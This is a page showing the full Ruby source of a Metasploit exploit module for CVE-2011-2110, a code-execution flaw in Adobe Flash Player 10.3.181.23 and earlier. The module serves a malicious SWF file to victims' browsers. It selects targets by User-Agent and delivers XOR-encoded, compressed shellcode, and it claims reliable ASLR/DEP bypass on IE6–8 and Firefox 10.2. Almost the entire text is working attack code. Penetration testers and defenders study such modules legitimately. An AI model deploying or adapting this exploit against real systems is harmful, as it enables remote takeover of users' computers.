Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::HttpServer::HTML910def initialize(info = {})11super(update_info(info,12'Name' => 'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution',13'Description' => %q{14This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.2315and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification16logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same17vulnerability that was used for attacks against Korean based organizations.1819Specifically, this issue occurs when indexing an array using an arbitrary value,20memory can be referenced and later executed. Taking advantage of this issue does not rely21on heap spraying as the vulnerability can also be used for information leakage.2223Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several24other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and25is very reliable.26},27'License' => MSF_LICENSE,28'Author' =>29[30'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit31'Unknown' # malware version seen used in targeted attacks32],33'References' =>34[35['CVE', '2011-2110'],36['OSVDB', '73007'],37['BID', '48268'],38['URL', 'http://www.adobe.com/devnet/swf.html'],39['URL', 'http://www.adobe.com/support/security/bulletins/apsb11-18.html'],40['URL', 'http://www.accessroot.com/arteam/site/download.php?view.331'],41['URL', 'http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617'],42],43'DefaultOptions' =>44{45'EXITFUNC' => 'process',46'HTTP::compression' => 'gzip',47'HTTP::chunked' => true,48'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'49},50'Payload' =>51{52'Space' => 2000,53'BadChars' => "\x00",54'DisableNops' => true55},56'Platform' => 'win',57'Targets' =>58[59[ 'Automatic', {}],60],61'DisclosureDate' => '2012-06-21',62'DefaultTarget' => 0))63end6465def exploit66# src for the flash file: external/source/exploits/CVE-2011-2110/CVE-2011-2110.as67# full aslr/dep bypass using the info leak as per malware68path = File.join( Msf::Config.data_directory, "exploits", "CVE-2011-2110.swf" )69fd = File.open( path, "rb" )70@swf = fd.read(fd.stat.size)71fd.close72super73end7475def check_dependencies76use_zlib77end7879def get_target(agent)80#If the user is already specified by the user, we'll just use that81return target if target.name != 'Automatic'8283if agent =~ /MSIE/84return targets[0] # ie 6/7/8 tested working85elsif agent =~ /Firefox/86return targets[0] # ff 10.2 tested working87else88return nil89end90end9192def on_request_uri(cli, request)93agent = request.headers['User-Agent']94my_target = get_target(agent)9596# Avoid the attack if the victim doesn't have the same setup we're targeting97if my_target.nil?98print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")99send_not_found(cli)100return101end102103xor_byte = 122104trigger = @swf105trigger_file = rand_text_alpha(rand(6)+3) + ".swf"106code = rand_text_alpha(rand(6)+3) + ".txt"107108sc = Zlib::Deflate.deflate(payload.encoded)109shellcode = ""110111sc.each_byte do | c |112shellcode << (xor_byte ^ c)113end114115uri = ((datastore['SSL']) ? "https://" : "http://")116uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])117uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{code}"118119bd_uri = Zlib::Deflate.deflate(uri)120121uri = ""122bd_uri.each_byte do | c |123uri << (xor_byte ^ c)124end125126bd_uri = uri.unpack("H*")[0]127128obj_id = rand_text_alpha(rand(6)+3)129130if request.uri.match(/\.swf/i)131print_status("Sending malicious swf")132send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })133return134end135136if request.uri.match(/\.txt/i)137print_status("Sending payload")138send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })139return140end141142html = <<-EOS143<html>144<head>145</head>146<body>147<center>148<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"149id="#{obj_id}" width="600" height="400"150codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">151<param name="movie" value="#{get_resource}/#{trigger_file}?info=#{bd_uri}" />152<embed src="#{get_resource}/#{trigger_file}?info=#{bd_uri}" quality="high"153width="320" height="300" name="#{obj_id}" align="middle"154allowNetworking="all"155type="application/x-shockwave-flash"156pluginspage="http://www.macromedia.com/go/getflashplayer">157</embed>158</object>159</center>160</body>161</html>162EOS163164html = html.gsub(/^ {4}/, '')165166print_status("Sending #{self.name} HTML")167send_response(cli, html, { 'Content-Type' => 'text/html' })168end169end170171172